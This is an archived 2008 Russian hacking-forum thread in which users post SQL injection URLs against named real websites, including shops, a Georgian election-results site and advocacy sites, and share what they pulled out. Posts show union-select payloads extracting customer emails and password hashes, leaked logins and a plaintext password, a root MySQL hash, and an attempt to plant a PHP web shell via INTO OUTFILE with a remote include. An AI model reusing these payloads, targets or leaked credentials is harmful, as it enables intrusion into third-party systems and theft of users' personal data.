ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

10.08.2008, 13:20
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме: 346497
Репутация:
303
|
|
http://www.norma.com.ua/main_description.php?newsletters_id=1'+union+selec t+1,2,AES_DECRYPT(AES_ENCRYPT(CONCAT((SELECT+CONCA T(customers_email_address,0x3a3a,customers_passwor d)+FROM+customers+limit+32,1)),0x71),0x71),4,5,6/*
Походу опять многократный хеш....
|
|
|

10.08.2008, 14:02
|
|
Участник форума
Регистрация: 18.11.2007
Сообщений: 184
Провел на форуме: 1686744
Репутация:
246
|
|
Код:
http://www.safelider.ru/view.php?item=-2877+union+select+1,user(),database(),version(),5,6,7,8,9,0/*
Помогите плиз незнаю что дальше делать  я просто только начинаю все осваивать и несовсем получается.
Последний раз редактировалось S0ulVortex; 10.08.2008 в 14:28..
|
|
|

10.08.2008, 14:33
|
|
Участник форума
Регистрация: 19.02.2008
Сообщений: 186
Провел на форуме: 584540
Репутация:
96
|
|
S0ulVortex вопросы по уязвимостям не сюда,дальше либо брут(если четвертая),либо вывод таблиц (если пятая) на сайте есть отличный фак! Читай!
|
|
|

10.08.2008, 15:09
|
|
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме: 2805813
Репутация:
1396
|
|
Сообщение от S0ulVortex
Код:
http://www.safelider.ru/view.php?item=-2877+union+select+1,user(),database(),version(),5,6,7,8,9,0/*
Помогите плиз незнаю что дальше делать  я просто только начинаю все осваивать и несовсем получается.
вот, просмотрел немного бд.
Version: 5.0.45-log
User: u13238@10.10.223.207
Database name: u13238
Database name: u13238_2
Database name: u13238_3
и кончилось терпение))
id:login:PASSWORD:fullname:email
3:v87zmi39:$1$8H$WcE80yjcg7U6/lAyfPhc80:Константин:admin@shifr.com
11  din:$1$E8$LTHwBBzaSQuFt2urqBkF5.:Андрей Ганзевич  din@2upost.com
9:v650mdr5:$1$QJ$1ULsLd3yP3jemXdo7l7Kt.:Андре й Сидоров:shop@vozmi.ru
|
|
|

10.08.2008, 15:09
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме: 346497
Репутация:
303
|
|
http://koshhejjka.sirenes.ru/index.php?d=22&p=-1+union+select+concat(name,0x3a3a,e_mail,0x3a3a,pa ss),2,3,4+from+tbl_artist+limit+1,10/*
Косяковые гловы....
login: webmaster@avoska.com
pass: jxtymcnhfiyjtrbyj
|
|
|

10.08.2008, 15:14
|
|
Участник форума
Регистрация: 08.11.2007
Сообщений: 102
Провел на форуме: 1266776
Репутация:
93
|
|
http://perekrestok.ca/
http://perekrestok.ca/?page=countries&country_id=-1+union+select+1,2,unhex(hex(concat(login,0x3,pass word,0x3,email,0x3,icq))),4,5,6,7+from+users+limit +0,0--
4.1.20inetlaba_perek@localhostinetlaba_perek
Adminvan1238admin@torgprom.com.ua111
Superadminvfhbzuelbyfinfo@integra-isc.com
gendolfvfhbzuelbyfgendolff@yahoo.ca
|
|
|

10.08.2008, 19:49
|
|
Участник форума
Регистрация: 12.11.2006
Сообщений: 213
Провел на форуме: 347573
Репутация:
185
|
|
Сообщение от $n@ke
вот, просмотрел немного бд.
Version: 5.0.45-log
User: u13238@10.10.223.207
Database name: u13238
Database name: u13238_2
Database name: u13238_3
и кончилось терпение))
На этой же базе висит сайт:
http://vozmi.ru
ТИЦ: 130
PR: 4
Код:
http://vozmi.ru/furniture/catalog.php?catalog=-97+union+select+user(),2,3/*
|
|
|

10.08.2008, 21:48
|
|
Познающий
Регистрация: 03.06.2007
Сообщений: 44
Провел на форуме: 418827
Репутация:
48
|
|
http://www.results.cec.gov.ge/ubnebi.php?district=22+and+1=@@version--
Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86) Oct 14 2005 00:33:37 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
|
|
|

10.08.2008, 23:27
|
|
Постоянный
Регистрация: 05.05.2008
Сообщений: 403
Провел на форуме: 2375039
Репутация:
1160
|
|
http://www.fofg.org/act/act_petition.php?pid=-1+union+select+1,2,3,4,5,6,7/*
version:4 =\
*******************
http://www.nationmultimedia.com/qvote/view_poll.php?page=13&pid=-239+union+select+1,convert(version()+using+latin1) ,3
version:4=\
*******************
http://www.cetim.ch/fr/publications_details.php?pid=-115+union+select+1,version(),3,4,5,6,7,8,9,0,1,2,3 ,4,5,6,7,8,9,0,1,2,3,4,5/*
Version:5.0.45-log3
user:cetimweb@imu129.infomaniak.ch3
http://www.cetim.ch/fr/publications_details.php?pid=-115+union+select+1,table_name,3,4,5,6,7,8,9,0,1,2, 3,4,5,6,7,8,9,0,1,2,3,4,5+from+information_schema. tables+limit+18,10/*
ничего интересного - сайт носит информационный характер
---------------------------------------------------------------------
http://www.solfocus.com/product.php?pid=-4+union+select+1,versio(),3,4,5,6,7,8/
*
User:root@localhost
Version:5
http://www.solfocus.com/product.php?pid=-4+union+select+1,table_name,3,4,5,6,7,8+from+infor mation_schema.tables+limit+18,10/*
Есть таблица db,копия mysql.user
http://www.solfocus.com/product.php?pid=-4+union+select+1,concat_ws(0x3a,user,password),3,4 ,5,6,7,8+from+mysql.user/*
root:*2F69143FB5C4B18522CA1EC561E137AB9D3F9170
Не могу залить шелл,расскажете если кто-то зальет)
а то я и так делал:
http://www.solfocus.com/product.php?pid=-4+union+select+1,<? @include("http://*****.narod.ru/shell.txt"); ?>,3,4,5,6,7,8+from+mysql.user+into+outfile+'C:\In etpub\phproot\hex.php'/
и в HEX фигачил,все равно не помогло =(
Последний раз редактировалось DDoSька; 10.08.2008 в 23:55..
|
|
|

10.08.2008, 23:54
|
|
Участник форума
Регистрация: 01.03.2006
Сообщений: 169
Провел на форуме: 519496
Репутация:
78
|
|
http://www.fergusonhill.co.uk/
http://www.fergusonhill.co.uk/product_details.php?id=7+union+select+1,2,3,4,5,6, 7,8,9,version(),11,12,13,14,15,16,17,18,19,20,21,2 2,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38, 39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55 ,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,7 2,73,74,75,76,77,78,79,80,81,82,83,84,85,86/*
Последний раз редактировалось Zircool; 11.08.2008 в 18:16..
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|